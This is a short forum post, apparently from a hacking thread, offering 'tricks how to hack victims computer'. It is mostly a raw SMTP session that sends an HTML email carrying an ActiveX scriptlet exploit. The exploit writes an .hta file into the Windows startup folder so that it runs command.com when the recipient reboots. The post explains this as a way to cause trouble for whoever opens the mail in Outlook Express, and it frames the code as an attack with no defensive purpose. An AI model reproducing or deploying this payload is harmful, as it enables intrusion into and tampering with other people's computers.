In this thread we will talk about viruses computer security and cryptography. As I said yesterday I put some tricks how to hack victims computer.
To make some computer download and launch some files we may use e-mail with necessary commands of SMTP , also we may with help of those commands launch some ActiveX components on our victims computer. This code and information was taken from www.guinski.com/scrtlb-desc.html
Code:
	helo somedomain.com
	mail from: [email protected]
	rcpt to: [email protected]
	data
	subject: You need to Read this
	MIME-version 1.0
	Content-Type: text/html; charset=us-ascii
	Content-Tranfer-Encoding: 7bit
	If You have received this message in error please delete it;)
	<object id=”scr” classid=”clsid:06290BD5-48AA-11D2-8432-006008C3FBFC”>
	</object>
	<SCRIPT>
	scr.Reset();
	scr.Path=”C:\\WIN98\\start menu\\programs\\startup\\attack.hta”;
	scr.Doc=”<object id=’wsh’ classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B’>
</object>
<SCRIPT> alert(‘Your security was destroyed’);wsh.Run(‘C:\\WIN98\\command.com’);
</”+”SCRIPT>”;
scr.write();
</SCRIPT>
</object>
.
quit
So with help of this thing, when our victim opens our mail in his Outlook Express, file with some scenario is placed to his computer, and when he reboot system he will got troubles .